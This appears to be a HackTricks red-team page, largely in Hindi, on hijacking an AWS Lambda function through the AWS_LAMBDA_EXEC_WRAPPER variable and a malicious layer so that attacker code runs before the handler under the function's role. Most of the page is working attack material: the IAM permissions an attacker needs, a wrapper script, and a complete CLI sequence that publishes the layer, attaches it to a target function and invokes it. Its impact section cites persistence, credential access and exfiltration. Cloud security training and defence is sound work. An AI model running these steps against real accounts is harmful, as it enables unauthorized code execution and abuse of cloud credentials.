AWS - Lambda Exec Wrapper Layer Hijack (Pre-Handler RCE)

Reading time: 4 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

सारांश

AWS_LAMBDA_EXEC_WRAPPER environment variable का दुरुपयोग करें ताकि runtime/handler शुरू होने से पहले हमलावर-नियंत्रित wrapper script चल सके। Wrapper को एक Lambda Layer में /opt/bin/htwrap पर वितरित करें, AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap सेट करें, और फिर function को invoke करें। Wrapper function के runtime process के अंदर चलता है, function execution role को inherit करता है, और अंत में वास्तविक runtime को exec करके मूल handler सामान्य रूप से चलता रहे ऐसा सुनिश्चित करता है।

warning

यह तकनीक लक्षित Lambda में code execution देती है बिना उसके source code या role को बदले और बिना iam:PassRole की आवश्यकता के। आपको केवल function configuration अपडेट करने और एक layer प्रकाशित/जोड़ने की क्षमता चाहिए।

आवश्यक अनुमतियाँ (attacker)

  • lambda:UpdateFunctionConfiguration
  • lambda:GetFunctionConfiguration
  • lambda:InvokeFunction (or trigger via existing event)
  • lambda:ListFunctions, lambda:ListLayers
  • lambda:PublishLayerVersion (same account) and optionally lambda:AddLayerVersionPermission if using a cross-account/public layer

Wrapper Script

Wrapper को layer में /opt/bin/htwrap पर रखें। यह pre-handler logic चला सकता है और वास्तविक runtime से चेन करने के लिए अंत में exec "$@" होना चाहिए।

bash
#!/bin/bash
set -euo pipefail
# Pre-handler actions (runs in runtime process context)
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json, os
try:
ident = boto3.client('sts').get_caller_identity()
print('[ht] sts identity:', json.dumps(ident))
except Exception as e:
print('[ht] sts error:', e)
PY
# Chain to the real runtime
exec "$@"

हमले के चरण (CLI)

लेयर प्रकाशित करें, लक्षित फ़ंक्शन से जोड़ें, wrapper सेट करें, invoke करें
bash
# Vars
REGION=us-east-1
TARGET_FN=<target-lambda-name>

# 1) Package wrapper at /opt/bin/htwrap
mkdir -p layer/bin
cat > layer/bin/htwrap <<'WRAP'
#!/bin/bash
set -euo pipefail
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json
print('[ht] sts identity:', __import__('json').dumps(__import__('boto3').client('sts').get_caller_identity()))
PY
exec "$@"
WRAP
chmod +x layer/bin/htwrap
(zip -qr htwrap-layer.zip layer)

# 2) Publish the layer
LAYER_ARN=$(aws lambda publish-layer-version \
--layer-name ht-exec-wrapper \
--zip-file fileb://htwrap-layer.zip \
--compatible-runtimes python3.11 python3.10 python3.9 nodejs20.x nodejs18.x java21 java17 dotnet8 \
--query LayerVersionArn --output text --region "$REGION")

echo "$LAYER_ARN"

# 3) Attach the layer and set AWS_LAMBDA_EXEC_WRAPPER
aws lambda update-function-configuration \
--function-name "$TARGET_FN" \
--layers "$LAYER_ARN" \
--environment "Variables={AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap}" \
--region "$REGION"

# Wait for update to finish
until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --query LastUpdateStatus --output text --region "$REGION")" = "Successful" ]; do sleep 2; done

# 4) Invoke and verify via CloudWatch Logs
aws lambda invoke --function-name "$TARGET_FN" /tmp/out.json --region "$REGION" >/dev/null
aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 50 --region "$REGION" --query 'events[].message' --output text

प्रभाव

  • फ़ंक्शन के मौजूदा execution role का उपयोग करते हुए Lambda runtime संदर्भ में handler से पहले कोड निष्पादन।
  • फ़ंक्शन कोड या role में कोई परिवर्तन आवश्यक नहीं; सामान्य managed runtimes (Python, Node.js, Java, .NET) पर काम करता है।
  • handler चलने से पहले persistence, credential access (e.g., STS), data exfiltration और runtime tampering सक्षम करता है।

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें